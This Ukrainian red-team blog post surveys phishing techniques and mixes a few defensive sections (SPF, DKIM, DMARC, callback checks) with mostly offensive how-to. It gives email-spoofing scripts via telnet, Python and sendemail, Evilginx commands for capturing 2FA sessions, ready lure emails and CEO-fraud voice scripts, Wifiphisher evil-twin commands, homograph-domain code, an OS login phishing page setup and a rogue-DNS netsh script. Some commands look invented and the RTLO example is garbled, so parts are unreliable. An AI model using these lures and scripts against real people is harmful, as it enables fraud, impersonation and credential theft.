Top phishing techniques

Фішинг у рамках red teaming передбачає імітацію реалістичних атак, які використовують людські вразливості для несанкціонованого доступу до систем або конфіденційної інформації. Ці методи можуть включати цілеспрямований фішинг (spear-phishing), коли надсилаються електронні листи конкретним особам з метою змусити їх натиснути на шкідливі посилання або розкрити облікові дані, або “whaling” — фішинг, спрямований на високопоставлених осіб, як-от керівників. Атакувальники також можуть використовувати голосовий фішинг (vishing) або фішинг через SMS (smishing), щоб виманити в жертв інформацію. Учасники red team створюють переконливі сценарії, щоб перевірити здатність організації виявляти та реагувати на ці техніки соціальної інженерії.

TOOLS FOR FIND VULNERABILITY

Логин Свят

2/12/20254 min read

Найпоширеніші техніки фішингу

Blue team, яка відповідає за захист, застосовує багаторівневий підхід до протидії фішинговим атакам. Це включає навчання працівників розпізнаванню підозрілих електронних листів і повідомлень, а також впровадження систем фільтрації електронної пошти та технологій протидії фішингу для блокування шкідливого контенту до того, як він досягне користувачів. Blue team також відстежує мережевий трафік на наявність індикаторів компрометації (IoC), таких як аномальні спроби входу або незвичні передачі даних. Плани реагування на інциденти розробляються для зменшення шкоди в разі успішних атак, забезпечуючи швидку ізоляцію, відновлення та аналіз для посилення захисту в майбутньому.

Людська розвідка (HUMINT) і соціальна інженерія у фішингу значною мірою покладаються на маніпуляції людськими емоціями та поведінкою, щоб обманом змусити людей поділитися конфіденційною інформацією. Фішери використовують HUMINT для збору персональних даних, таких як службові ролі, інтереси та зв’язки, що дозволяє їм створювати цілеспрямовані атаки. Соціальна інженерія підсилює ці атаки шляхом використання емоційних тригерів, таких як страх, терміновість, довіра та жадібність. Ці методи змушують людей приймати імпульсивні рішення, наприклад, натискати на шкідливі посилання або ділитися обліковими даними, переконуючи їх у легітимності або терміновості запиту.

Міміка обличчя та її розпізнавання мають ключове значення як для нападників, так і для захисників у сценаріях соціальної інженерії. Фішери можуть спостерігати емоції, такі як страх, розгубленість або полегшення, щоб скоригувати свій підхід, зробивши свою історію більш правдоподібною. З боку захисту розпізнавання емоційних реакцій може допомогти командам захисту (blue team) навчити працівників призупиняти дію та критично оцінювати підозрілі запити. Ось шпаргалка з поширеними сценаріями та емоційними тригерами, які вони експлуатують:

Шпаргалка: Сценарії фішингу та емоційні тригери

Страх/Тривожність
• Сценарій: «Ваш обліковий запис було скомпрометовано. Негайно скиньте пароль!»
• Емоційний тригер: Страх втрати доступу або розголошення приватних даних.
• Реакція: Жертва лякається й натискає на шкідливе посилання, не перевіривши джерело.
Цікавість
• Сценарій: «Ви отримали конфіденційний документ. Відкрийте для перегляду.»
• Емоційний тригер: Зацікавленість через таємничість або ексклюзивність.
• Реакція: Жертва відкриває вкладення, яке встановлює шкідливе ПЗ.
Терміновість
• Сценарій: «Завершіть цей платіж зараз, щоб уникнути пені.»
• Емоційний тригер: Тиск діяти швидко, не маючи часу на перевірку.
• Реакція: Жертва поспішає й вводить платіжні дані на фішинговому сайті.
Довіра/Авторитет
• Сценарій: «Це ваш керівник. Мені потрібно, щоб ви негайно переказали кошти на цей рахунок.»
• Емоційний тригер: Повага до авторитету, страх не підкоритися.
• Реакція: Жертва, вважаючи, що запит надійшов від керівника, виконує його без перевірки легітимності.
Жадібність/Збудження
• Сценарій: «Ви виграли подарункову карту на $1000! Натисніть, щоб отримати приз.»
• Емоційний тригер: Бажання винагороди або фінансової вигоди.
• Реакція: Жертва надає особисту інформацію, щоб отримати неіснуючий приз.

Відсутність SPF

Emkei.cz — це онлайн-інструмент, який дозволяє користувачам надсилати підроблені електронні листи, просто заповнивши форму. Цей інструмент може бути зловживаний для фішингу та соціальної інженерії, оскільки дозволяє підробити адресу “From”, створюючи враження, що лист надійшов від легітимного або надійного джерела. Розуміння того, як зловмисники використовують такі інструменти, як Emkei.cz, може допомогти у формуванні ефективних заходів захисту.

Як Emkei.cz працює для надсилання підроблених листів

Використання Emkei.cz для надсилання фейкових листів включає введення кількох полів і натискання кнопки “Send”. Ось покрокова інструкція:

Доступ до сайту:
• Перейдіть на emkei.cz у своєму браузері.
Заповнення форми:
• From: Введіть фейкову адресу відправника, наприклад ceo@company.com.
• To: Вкажіть електронну адресу жертви, наприклад victim@targetdomain.com.
• Subject: Напишіть будь-яку тему, наприклад: Urgent: Підтвердження платежу.
• Message: Сформулюйте текст повідомлення, наприклад:

Дорогий Джоне,

Будь ласка, здійсни платіж у розмірі $5,000 на прикріплений рахунок. Це терміново.

З повагою,

Генеральний директор

Параметри SMTP: Можна використовувати налаштування за замовчуванням або налаштувати власний SMTP, якщо потрібно. Користувацький SMTP допомагає ще більше приховати походження листа.
Вкладення: За бажанням можна додати файли (які можуть містити шкідливе ПЗ або інші небезпечні елементи).
Надсилання листа: Після заповнення форми натисніть кнопку Send Email, і підроблений лист буде надіслано жертві.

Простота цього процесу робить Emkei.cz привабливим для зловмисників. Він не потребує технічних навичок, а надіслані листи можуть виглядати вкрай правдоподібно для жертв.

Як запобігти надсиланню підроблених листів через Emkei.cz

Запобігання підробленим листам, як ті, що надсилаються через Emkei.cz, вимагає багаторівневої стратегії захисту з акцентом на методи автентифікації електронної пошти та моніторинг.

1. Налаштування SPF (Sender Policy Framework)

SPF — це DNS-запис, який визначає, які поштові сервери мають дозвіл надсилати електронну пошту від імені вашого домену. Якщо його правильно налаштувати, він може блокувати несанкціоновані сервери (як-от сервери Emkei.cz) від надсилання листів від вашого імені.

Щоб додати SPF-запис:

• Додайте це у DNS-налаштування вашого домену:

example.com. IN TXT "v=spf1 ip4:192.0.2.1 -all"

• ip4:192.0.2.1: Вказує IP-адресу авторизованого поштового сервера.

• -all: Відхиляє всі листи, які надходять не з авторизованих IP-адрес.

Перевірка вашого SPF-запису:

Ви можете скористатися онлайн-інструментами, такими як MXToolbox або інструментами командного рядка для перевірки SPF-запису:

dig txt example.com

Переконайтесь, що SPF-запис налаштований правильно та включає всі легітимні поштові сервери вашого домену.

2. Налаштування DKIM (DomainKeys Identified Mail)

DKIM додає криптографічний підпис до заголовків вихідної пошти. Якщо хтось спробує надіслати лист від імені вашого домену без цього підпису (як це робить Emkei.cz), його буде позначено як підозрілий.

Кроки для налаштування DKIM:

• Згенеруйте пару DKIM-ключів (публічний і приватний).

• Опублікуйте публічний ключ як DNS TXT-запис для вашого домену.

• Налаштуйте поштовий сервер на підписування вихідних листів приватним ключем.

Приклад DNS-запису DKIM:

default._domainkey.example.com. IN TXT "v=DKIM1; k=rsa; p=your_public_key"

Команда для перевірки DKIM-запису:

dig txt default._domainkey.example.com

Переконайтесь, що налаштування DKIM працює правильно, протестувавши його за допомогою інструментів, як-от dmarcian.com.

3. Налаштування DMARC (Domain-based Message Authentication, Reporting, and Conformance)

DMARC дозволяє власникам доменів визначати, як сервери-отримувачі повинні обробляти листи, які не проходять перевірки SPF або DKIM (наприклад, відхиляти або поміщати в карантин).

Кроки для налаштування DMARC:

• Додайте такий DNS TXT-запис:

_dmarc.example.com. IN TXT "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com; ruf=mailto:forensic-reports@example.com"

Цей запис означає:

p=reject: Листи, які не проходять перевірку DMARC, будуть відхилені.
rua: Зведені звіти надсилатимуться на адресу dmarc-reports@example.com.
ruf: Форензічні (детальні) звіти надсилатимуться на forensic-reports@example.com.

Перевірити запис DMARC за допомогою командного рядка:

dig txt _dmarc.example.com

Це гарантує, що ваш запис DMARC належним чином опублікований і розпізнається поштовими серверами-отримувачами.

Обхід SPF

SPF (Sender Policy Framework) — це механізм автентифікації електронної пошти, який допомагає запобігати розсилці спаму від імені вашого домену. SPF працює, дозволяючи власникам доменів визначати, які поштові сервери мають дозвіл надсилати пошту від імені їх домену. Коли сервер отримує листа, він перевіряє SPF-запис домену відправника, щоб дізнатися, чи має IP-адреса відправника право надсилати пошту з цього домену. Якщо перевірка SPF не проходить, лист може бути позначений як спам або відхилений.

1. Створення DNS-запису:

Власник домену публікує SPF-запис у DNS (Domain Name System). Цей запис вказує всі авторизовані поштові сервери для домену.

Приклад SPF-запису:

v=spf1 ip4:192.168.1.1 include:example.com -all

1. Цей запис дозволяє IP-адресі 192.168.1.1 та домену example.com надсилати листи від імені домену. Параметр -all вказує, що всі інші IP-адреси повинні не пройти перевірку SPF.

2.Перевірка сервером-отримувачем: Коли отримується лист, поштовий сервер-отримувач перевіряє DNS-запис домену відправника. Якщо IP-адреса відправника збігається з дозволеною, SPF вважається пройденим.

Використання Telnet для підробки електронної пошти

Telnet можна використати для прямої взаємодії з SMTP-сервером (Simple Mail Transfer Protocol) і надсилання електронних листів. Ось як це працює:

Кроки:

Відкрийте термінал і використайте Telnet для підключення до поштового сервера:

telnet smtp.example.com 25

Сервер відповість. Тепер привітайтеся з сервером командою SMTP:

HELO example.com

Встановіть підроблену електронну адресу відправника:

MAIL FROM: <fake@example.com>

Продовження: Підробка електронної пошти через Telnet

Встановіть адресу одержувача:

RCPT TO: <victim@targetdomain.com>

Почніть створення повідомлення:

DATA

Напишіть тіло листа та заголовки:

Subject: Important Update

From: CEO <ceo@company.com>

To: victim@targetdomain.com

Привіт,

Це підроблений лист. Будь ласка, дотримуйтесь інструкцій нижче…

(крапка в кінці — обов’язковий сигнал завершення повідомлення в SMTP)

Завершіть повідомлення крапкою (.) на новому рядку, щоб надіслати його:

Завершіть сеанс:

QUIT

Лист буде надіслано одержувачу, потенційно оминаючи слабкі механізми захисту електронної пошти.

Використання Python для підробки електронної пошти

Бібліотека smtplib у Python дозволяє створювати сценарії для надсилання листів, зокрема підроблених.

Приклад Python-коду:

import smtplib

# Налаштування сервера

server = smtplib.SMTP('smtp.example.com', 25) # Замініть на цільовий SMTP-сервер і порт

server.ehlo()

# Створення повідомлення

from_email = "ceo@company.com" # Підроблений відправник

to_email = "victim@targetdomain.com"

subject = "Urgent: Security Update"

message = f"""\

From: CEO <ceo@company.com>

To: {to_email}

Subject: {subject}

Dear User,

Please reset your password immediately at the following link:

http://malicious-link.com

Sincerely,

CEO

"""

# Надсилання листа

server.sendmail(from_email, to_email, message)

server.quit()

⚠️ Застереження: цей приклад наведено для освітніх цілей. Підробка електронної пошти без згоди є незаконною та порушує етичні норми.

Невідповідність Return-Path

Однією з найпоширеніших технік фішингу є підробка адреси відправника, щоб створити враження, що лист надійшов від надійного джерела. Швидкий спосіб виявити це — порівняти поле Sender з полем Return-Path у заголовку листа. Атакувальник підробляє поле “From”, але справжній сервер, що надсилає листа, може бути іншим — саме це і видає атаку.

Кроки для перевірки відправника та Return-Path:

Відкрийте лист.
Натисніть на три крапки (︙) у правому верхньому куті листа та оберіть Показати оригінал (у сервісах на кшталт Gmail).
Перевірте поле Sender в тілі листа та поле Return-Path у вихідних заголовках.
Якщо Sender (видимий) і Return-Path (у технічному джерелі) не збігаються, це ймовірна фішингова атака.

Сценарій атаки — Код для надсилання фальшивого листа з підробленим Return-Path:

Атакувальник може використати інструменти, як-от Sendmail, щоб підробити адресу “From”, одночасно вказавши інший Return-Path:

sendemail -f attacker@fakecompany.com -t victim@legitcompany.com \

-u "Urgent: Payment Required" \

-m "Please process the payment today." \

-s smtp.fakeserver.com:25 -o message-header="Return-Path: <attackerserver@malicious.com>"

У цьому прикладі Return-Path встановлено на інший сервер. Після натискання «Показати оригінал» одержувач може побачити цю невідповідність і виявити підробку.

Діпфейки або Вішинг

Фішинг суттєво еволюціонував, включаючи передові технології, як-от відео-діпфейки та фейкові голоси, згенеровані ШІ, щоб обманювати та маніпулювати жертвами. Ці нові техніки роблять фішингові атаки ще переконливішими, оскільки імітують довірених осіб як візуально, так і аудіально. Це додає новий рівень складності до традиційних фішингових методів і вимагає сучасних заходів протидії.

1. Фішинг з використанням діпфейків (маніпуляція відео)

Діпфейковий фішинг передбачає використання згенерованих ШІ відео, щоб видавати себе за довірених осіб, таких як керівники компанії або публічні фігури. Зловмисники можуть застосовувати діпфейки у фішингових кампаніях, щоб змусити співробітників чи окремих осіб виконати дії, як-от:

переказ грошей,
передача конфіденційної інформації,
відкриття шкідливих посилань.

Сценарій атаки з використанням відео-діпфейку

1. Створення діпфейк-відео:

Атакувальники використовують ШІ-інструменти, як-от DeepFaceLab або FaceSwap, щоб створити відео, де вони імітують високопоставленого керівника або довірену особу. Потім вони створюють фішинговий лист або повідомлення з вбудованим відео, змушуючи жертву терміново діяти.

Приклад процесу створення діпфейку з використанням DeepFaceLab:

(у документі зазначено посилання на демонстрацію або інструкцію, як саме відбувається підробка).

Зберіть відео з особою, яку потрібно підробити (вихідне відео), і відео актора (цільове відео).

• Витяг облич із вихідного відео:

python main.py extract --input-dir path/to/source_video --output-dir path/to/faces

• Навчання моделі для генерації діпфейку:

python main.py train --data-dir path/to/dataset

• Генерація діпфейк-відео:

python main.py merge --input-dir path/to/trained_model --output-dir path/to/output_video

Фішинг із використанням фейкового голосу, згенерованого ШІ

Голоси, згенеровані штучним інтелектом (так звані voice deepfakes або vishing — голосовий фішинг), можуть використовуватись для імітації довірених осіб у телефонних розмовах або голосових повідомленнях. Атакувальники можуть синтезувати голос, використовуючи алгоритми машинного навчання, роблячи фішингові атаки ще переконливішими.

Сценарій атаки з використанням фейкового голосу

1.Створення фейкового голосу за допомогою ШІ:

Інструменти, як-от Descript або Lyrebird, можуть створити голосовий діпфейк, навчивши ШІ на зразку голосу цільової особи.

Приклад процесу за допомогою Descript:

Запишіть або зберіть зразок голосу цілі (наприклад, з публічних виступів, відео чи подкастів).
Навчіть ШІ імітувати цей голос:

descript clone --voice-sample path/to/voice_sample.wav --output voice_model

Згенеруйте голосовий фрагмент з підробленим голосом:

descript synthesize --model voice_model --text "Please approve this fund transfer by end of day."

Атака через Vishing

Vishing-атака: Зловмисник використовує згенерований ШІ голос, щоб здійснювати телефонні дзвінки або надсилати голосові повідомлення, видаючи себе за керівника чи менеджера.

Наприклад, він може зателефонувати співробітнику з проханням переказати кошти або надати конфіденційні дані.

Приклад сценарію голосового повідомлення:

"Привіт, це ваш CEO. Я на терміновій зустрічі й мені потрібно, щоб ви прямо зараз переказали $15,000 на цей рахунок. Деталі надішлю трохи згодом на пошту. Дякую!"

Техніки захисту від фішингу з фейковим голосом

Біометрична автентифікація голосу:
Використовуйте інструменти біометричної автентифікації голосу (наприклад, Nuance або Pindrop) для виявлення аномалій у голосових шаблонах.
Протоколи зворотного дзвінка (Callback Protocols):
Запровадьте політику обов’язкового зворотного дзвінка: співробітники мають перевіряти фінансові чи конфіденційні запити, передзвонюючи на відомий та надійний номер.
Виявлення голосу в реальному часі (Real-Time AI Voice Detection):
Сучасні ШІ-інструменти здатні аналізувати дзвінки в реальному часі та визначати, чи є голос синтетичним, щоб виявляти підозрілі звернення.

2FA

Evilginx 3.0 — це потужний інструмент для проведення фішингових атак, спеціально розроблений для обходу двохфакторної автентифікації (2FA). Він працює як зворотний проксі, перехоплюючи та передаючи дані між жертвою і легітимним сервісом. Це дозволяє зловмисникам викрасти облікові дані та токени автентифікації, навіть якщо жертва використовує 2FA (наприклад, TOTP або SMS-коди).

Сценарій атаки: Evilginx 3.0 для фішингу та обходу 2FA

Налаштування та конфігурація: Evilginx працює як людина посередині (MITM) між жертвою та легітимною сторінкою входу. Він здатен перехопити як ім’я користувача/пароль, так і токен сесії, який створюється після успішної 2FA-автентифікації.

phishlets hostname google phishingdomain.com

phishlets enable google

lures create google

Після цього Evilginx клонуватиме сторінку входу Google на домені

phishingdomain.com

Створення фішингового посилання:

Після активації phishlet і lure, Evilginx згенерує фішингове посилання, яке перенаправить жертву на фальшиву сторінку входу.

lures get-url 0

Проведення фішингової атаки

Надсилання фішингового посилання (URL):

Атакувальник надсилає фішингове посилання жертві через email, SMS або інші методи соціальної інженерії.

Приклад фішингового листа:

Subject: Urgent: Unusual Login Attempt

Привіт,

Ми зафіксували незвичну спробу входу до вашого облікового запису Google.

Будь ласка, перейдіть за посиланням нижче, щоб підтвердити свою особу:

https://phishingdomain.com/google/login

Regards,

Google Security Team

Жертва вводить облікові дані:

Після натискання на посилання жертву перенаправляють на клоновану сторінку входу, створену Evilginx. Вона вводить свій логін, пароль і 2FA-код.

Evilginx захоплює облікові дані та токен 2FA:

Evilginx перехоплює ім’я користувача, пароль, 2FA-код (OTP) та передає їх легітимному сервісу. У відповідь сервіс повертає cookie сесії, яку також зберігає Evilginx.

Приклад захоплених облікових даних:

[201.202.45.12] [google] [user@gmail.com] [password123]

[google] Session cookie captured: GA1.2.1234567890.session

Атака через гомографи та помилки в написанні (Typosquatting)

Атака з гомографами — це тип фішингової атаки, що використовує візуальну схожість символів із різних наборів (зазвичай Unicode), щоб створити шкідливі URL-адреси, які виглядають майже ідентично легітимним.

Зловмисники використовують ці оманливі URL-адреси, щоб змусити користувачів переходити на шкідливі сайти, думаючи, що вони потрапили на легітимний домен.

Ця техніка особливо небезпечна, оскільки користувачі можуть навіть не помітити тонких відмінностей між справжніми та фейковими URL.

Приклад:

Розглянемо легітимний домен: apple.com.

Зловмисник може створити шкідливу адресу аpрle.com, де символи a і p насправді є кириличними, а не латинськими.

На перший погляд обидві адреси виглядають однаково, але ведуть на зовсім різні сайти

Зловмисники використовують ці фейкові URL у фішингових листах, кампаніях соціальної інженерії або шкідливих оголошеннях, щоб виманити в користувачів конфіденційну інформацію:

логіни, паролі, дані кредитних карт або персональні дані.

Зловмисники можуть використовувати різні онлайн-інструменти або скрипти для створення гомографічних URL-адрес. Наприклад, за допомогою бібліотеки Python idna (Internationalized Domain Names in Applications) можна перетворити символи Unicode у Punycode, щоб зареєструвати домен, схожий на легітимний.

Приклад створення гомографічного домену на Python:

import idna

# Оригінальний домен

original_domain = "apple.com"

# Створення гомографічного домену з кириличними літерами

homograph_domain = "аррle.com"

# Конвертація гомографічного домену в Punycode

punycode_domain = idna.encode(homograph_domain).decode()

print(f"Homograph domain in Punycode: {punycode_domain}")

Результат:

Homograph domain in Punycode: xn--80ak6aa92e.com

Це дозволяє створити домен, який виглядає майже ідентично оригінальному, але технічно веде на інший сайт.

2. Помилки в написанні у фішингових атаках (Typosquatting)

Typosquatting — це ще один тип фішингової атаки, коли зловмисник реєструє доменні імена, схожі на легітимні, але з друкарськими помилками або незначними змінами. Мета — скористатися типовими помилками під час введення URL, щоб перенаправити користувача на фішинговий сайт, що імітує справжній.

Приклад:

Законний домен — google.com,

але typosquatter може зареєструвати gooogle.com (з додатковою “о”).

Якщо користувач випадково введе неправильну адресу — він потрапить на шкідливий сайт, створений для крадіжки даних

Зловмисники також використовують typosquatting у фішингових email-кампаніях — наприклад, змінюють адресу відправника на схожу:

Легітимна: support@paypal.com
Фейкова: support@paypa1.com

Один із корисних інструментів для тестування та генерації typosquatting-доменів — це PhishiUrl, доступний на GitHub: 🔗 PhishiUrl

Цей інструмент автоматизує створення подібних або помилкових доменів для фішингу або тренувань у red team.

Приклад використання PhishiUrl:

git clone https://github.com/EmadYaY/PhishiUrl.git

cd PhishiUrl

python3 phishiurl.py --domain google.com --type squatting

Фішинг-сторінка на рівні операційної системи (OS Layer Phishing Page)

Фішингові атаки можуть бути спрямовані на облікові дані операційної системи, імітуючи екран входу, який виглядає автентичним для користувача.

У цьому документі показано, як створити фішингову сторінку, що імітує екран входу ОС для Windows, macOS або Linux.

Мета: отримати облікові дані користувача, коли він вводить їх на підробленій, але схожій на справжню, формі входу.

Ось як створити та розгорнути фішингові сторінки для кожної ОС:

1. Фішингова сторінка Windows OS

Ця сторінка імітує екран входу в Windows 10 і захоплює облікові дані за допомогою JavaScript.

Вона розроблена для роботи в режимі kiosk mode, щоб запобігти виходу користувача з програми.

Інструкція з налаштування:

1. Створіть index.html:

Цей HTML-файл повинен містити форму входу, стилізовану під екран входу Windows 10.

Він захоплює введені користувачем дані та надсилає їх на сервер.

Запуск у режимі Kiosk Mode

Запустіть фішингову сторінку в режимі кіоску, щоб не дозволити користувачу вийти з неї.

• Для Chrome:

"C:\Program Files\Google\Chrome\Application\chrome.exe" --kiosk file:///path/to/index.html

• Для Firefox:

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk file:///path/to/index.html

🔗 GitHub посилання (наведене як джерело прикладу у зображенні).

Інтерфейсний рівень, як Rogue Access Point Framework

Wifiphisher — це універсальний інструмент, який використовується в red teaming та для оцінки безпеки Wi-Fi-мереж. Він дозволяє проводити складні фішингові атаки через бездротові мережі.

Цей фреймворк дає можливість пентестерам створювати фейкові точки доступу (rogue AP), щоб захоплювати конфіденційні дані або розповсюджувати шкідливе ПЗ.

1. Досягнення положення “людина посередині” (MITM)

Початковий етап Wi-Fi фішингу полягає у вставленні себе між цільовими пристроями та легітимною мережею.

Wifiphisher використовує кілька технік для цього:

Evil Twin Attack:
Створює фейкову точку доступу з тим самим SSID, що й у справжньої мережі, змушуючи пристрої автоматично підключатись до неї.
KARMA Attack:
Імітує публічну мережу, до якої клієнти часто підключались раніше, і приманює їх до підключення до фейкової точки доступу.
Known Beacons Attack:
Транслює список раніше збережених SSID, до яких вже підключалися пристрої поблизу, підвищуючи шанс на успішне з’єднання.

2. Проведення фішингових атак

Після того як Wifiphisher досягне положення “людина посередині” (MITM), він може використовуватись для запуску різних фішингових або шкідливих атак:

Веб-фішинг (Web Phishing):
Створює й показує фейкові сторінки входу для збору облікових даних.
Наприклад, імітуючи вікно входу Windows Network Manager, Wifiphisher може змусити користувачів ввести WPA/WPA2-ключ доступу.
Розповсюдження шкідливого ПЗ (Malware Distribution):
У складніших сценаріях зловмисники можуть змусити жертв завантажити шкідливе ПЗ, замасковане під “оновлення прошивки”.

Приклад запуску Evil Twin атаки зі спеціальним сценарієм:

wifiphisher -aI wlan0 -jI wlan4 -p firmware-upgrade --handshake-capture handshake.pcap

Автоматичне націлення на конкретну мережу та сценарій:

wifiphisher --essid CONFERENCE_WIFI -p plugin_update -pK 53cr3tp4ssw0rd

Запуск атаки на відкриту мережу зі сценарієм авторизації OAuth:

wifiphisher --essid "FREE WI-FI" -p oauth-login -kB

🔗 GitHub — Wifiphisher

Перевірка як хакер — ClickFix

Фішингова техніка з підробленою reCAPTCHA полягає у створенні сторінки, що імітує легітимну перевірку “Я не робот”, але фактично змушує користувача виконати шкідливу команду на власному комп’ютері.

Атака використовує довіру до знайомих форм reCAPTCHA для обходу обережності користувачів.

Сценарій атаки:

1.Створення приманки (Lure Creation):

Зловмисник створює фейкову сторінку reCAPTCHA з інструкцією на кшталт “Підтвердіть, що ви людина” — візуально вона майже не відрізняється від справжньої.
На сторінці є кнопка або форма, яка при взаємодії просить користувача відкрити вікно запуску Windows (Win+R) та вставити команду, що автоматично була скопійована в буфер обміну.

2.Виконання (Execution):

Як тільки користувач вставляє команду в Run (Win+R), вона виконується на його пристрої.
Команда може бути шкідливим скриптом або програмою, що краде облікові дані, встановлює малвар або виконує інші дії.
Сторінка може також показувати фальшиві повідомлення про помилки чи інші інструкції, щоб утримати увагу жертви й довести атаку до кінця.

Домен прострочено, але потрібен хакер

Domain Hunter- інструмент допомагає виявити прострочені або доступні домени, які раніше використовувались у нешкідливих цілях, але можуть бути повторно використані для фішингу або задач C2 (command-and-control).

Можливості:

Отримує нещодавно прострочені домени з ExpiredDomains.net.
Перевіряє репутацію доменів через сервіси: Symantec Site Review, IBM X-Force, Cisco Talos.
Виводить результати у вигляді тексту або HTML з посиланнями на джерела репутації та Archive.org.

Приклади використання:

• Пошук прострочених доменів по ключовому слову:

./domainhunter.py -k apples -c --ocr -t5

Шукає домени, пов’язані зі словом “apples”, перевіряє репутацію та обходить CAPTCHA.

• Перевірка конкретного домену:

./domainhunter.py --single mydomain.com

• Отримання 1000 найсвіжіших прострочених доменів:

python3 ./domainhunter.py -r 1000

GitHub — threatexpress/domainhunter

DNS Hijacking

DNS Hijacking (також відомий як DNS-редирекція) — це техніка, яка дозволяє маніпулювати процесом розв’язання доменних імен. Зловмисники змінюють те, як доменні імена перетворюються на IP-адреси, щоб:

перенаправити трафік на шкідливі сайти,
заблокувати доступ до легітимних ресурсів,
перехоплювати або змінювати трафік.

Ця техніка часто використовується у фішингових атаках для перенаправлення жертв на фальшиві сайти, що імітують легітимні.

1.Перенаправлення на фейкові DNS-сервери (Rogue DNS Servers)

Зловмисники можуть змінити налаштування DNS жертви, щоб вона використовувала фейковий DNS-сервер.
Цей сервер перенаправляє запити на шкідливі сайти, замасковані під справжні.
Наприклад: користувач вводить bank.com, але DNS перенаправляє на фішингову копію сайту банку.

2.Компрометація легітимних DNS-серверів

Атакувальники можуть зламати або скористатися вразливістю в DNS-серверах, щоб змінити записи DNS.
Наприклад: запис для paypal.com змінено так, що трафік іде на фішинговий сайт, а не на справжній.

3.Атаки “людина посередині” (MITM)

Перенаправляючи DNS-запити через свій сервер, зловмисник може перехоплювати або змінювати вебтрафік.
Це може призвести до витоку даних або запуску додаткових атак.

4.Маніпуляції з боку провайдерів або DNS-сервісів

Деякі провайдери або DNS-провайдери можуть змінювати трафік для реклами або інших цілей.
Навіть якщо це не шкідливе втручання, воно порушує конфіденційність користувача й створює ризики.

Приклад сценарію DNS Hijacking

Нижче наведено фрагмент коду на Python, який демонструє, як зловмисник може змінити DNS-налаштування на Windows-машині за допомогою команди netsh.

Цей приклад призначений винятково для ознайомлення та показує, як можуть змінюватися DNS-налаштування.

import subprocess

# Замініть на IP-адресу фейкового DNS-сервера

rogue_dns_server = "10.0.0.1"

# Отримати поточні DNS-налаштування

current_dns_servers = subprocess.check_output(["netsh", "interface", "ip", "show", "dnsservers"])

# Змінити DNS-налаштування на адресу фейкового DNS-сервера

subprocess.call(["netsh", "interface", "ip", "add", "dnsservers", "Wi-Fi", rogue_dns_server])

# Перевірити, чи DNS-налаштування було змінено

new_dns_servers = subprocess.check_output(["netsh", "interface", "ip", "show", "dnsservers"])

print(new_dns_servers.decode())

Джерело: unprotect.it — DNS Hijacking

Fast Flux

Fast Flux — це передова техніка, яку використовують кіберзлочинці для приховування розташування фішингових сайтів і серверів доставки шкідливого ПЗ.

Постійно змінюючи IP-адреси, пов’язані з доменом, Fast Flux ускладнює роботу служб безпеки та правоохоронних органів у виявленні та блокуванні зловмисної інфраструктури.

Ця техніка використовує мережу скомпрометованих хостів як проксі, підвищуючи анонімність та стійкість ботнету.

1. Динамічні DNS-записи

Fast Flux базується на динамічних DNS-записах, які часто змінюють IP-адресу, пов’язану з доменом.
При кожному DNS-запиті можуть повертатись різні IP-адреси, що ускладнює визначення справжнього розташування сервера.

2. Ботнет скомпрометованих хостів

Використовується велика кількість заражених пристроїв (ботів), які виступають як проксі.
Ці пристрої постійно чергуються у DNS-записах, змінюючи IP-адреси — це робить блокування менш ефективним.

3. Peer-to-Peer мережі

Fast Flux може поєднуватись із P2P-мережами, де вузли обмінюються інформацією напряму.
Це значно ускладнює виявлення та знищення мережі ботів.

4. Розподілена інфраструктура управління (C2)

Розміщення серверів керування по багатьох вузлах підвищує стійкість.
Якщо один вузол вимикається, інші продовжують функціонувати — ботнет не зупиняється і продовжує працювати через інші скомпрометовані вузли.

Приклад симуляції Fast Flux

Нижче наведено приклад коду на Python, який демонструє спрощену симуляцію Fast Flux, коли DNS-сервер повертає декілька IP-адрес (замість однієї) для одного домену.

Використовуються бібліотеки dnslib і socket.

import dnslib

import socket

# IP-адреса DNS-сервера (приклад: Google DNS)

dns_server = "8.8.8.8"

# Домен, який ви контролюєте

domain_name = "example.com"

# Список IP-адрес скомпрометованих вузлів

proxy_addresses = ["10.0.0.1", "10.0.0.2", "10.0.0.3"]

# Створити DNS-запит

query = dnslib.DNSRecord.question(domain_name)

# Надіслати DNS-запит на сервер

dns_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

dns_socket.sendto(query.pack(), (dns_server, 53))

# Отримати відповідь від DNS-сервера

response = dnslib.DNSRecord.parse(dns_socket.recv(4096))

# Модифікувати відповідь, додаючи IP-адреси проксі

response.add_answer(dnslib.RR.fromZone(f"{domain_name} A " + " ".join(proxy_addresses)))

# Відправити змінену відповідь назад до клієнта (потрібна реальна адреса)

client_address = ("client_ip", 12345)

dns_socket.sendto(response.pack(), client_address)

Цей код демонструє, як Fast Flux обманює DNS-запити, динамічно змінюючи IP-адреси, щоб ускладнити відстеження справжнього розташування сервера.

🔗 unprotect.it — Fast Flux

Reflective File Download

Reflective File Download — це складна фішингова техніка, за якої зловмисники використовують легітимні сервіси або сайти для розповсюдження шкідливих файлів.

Мета — змусити користувача завантажити файл, який виглядає безпечним, але фактично є інструментом для компрометації системи.

1. Використання довіри до легітимних джерел

Атакувальники використовують скомпрометовані або легітимні сайти для розміщення/поширення шкідливих файлів.
Ці джерела викликають довіру, тому фішинг виглядає менш підозрілим.

2. Маскування та введення в оману

Шкідливий файл часто маскується під PDF, Word або .exe-файл.
Він може містити макроси, скрипти чи інші форми шкідливого коду, призначені для використання вразливостей у системі жертви.

3. Механізм доставки

Шкідливий файл зазвичай надсилається через:
- електронні листи,
- посилання в фішингових повідомленнях,
- або розміщується на скомпрометованих легітимних сайтах.
Повідомлення часто містять переконливий контент, щоб змусити користувача завантажити та відкрити файл.

4. Виконання та навантаження

Після того, як жертва завантажує та відкриває файл, той може:
- виконати шкідливий код,
- викрасти облікові дані,
- встановити додаткове шкідливе ПЗ,
- або використати вразливості ОС для подальшої атаки.

Символ RTLO (Right-to-Left Override)

RTLO (Right-to-Left Override) — це спеціальний керівний символ Unicode, який можна використати у фішингових атаках для маскування істинного розширення файлу, посилання або адреси електронної пошти.

Його мета — ввести користувача в оману, щоб той відкрив шкідливий файл або перейшов за фейковим посиланням, думаючи, що воно безпечне.

Юнікод-значення: U+202E
Призначення: змінює напрямок тексту на «справа-наліво», дозволяючи частині тексту виглядати навпаки, ніж фактично.

Як RTLO використовується у фішингових атаках

1.Маскування розширень файлів

Приклад:
Приклад: Файл з назвою document.pdf може бути замаскований як document.pdf, якщо перед .pdf вставити символ RTLO.
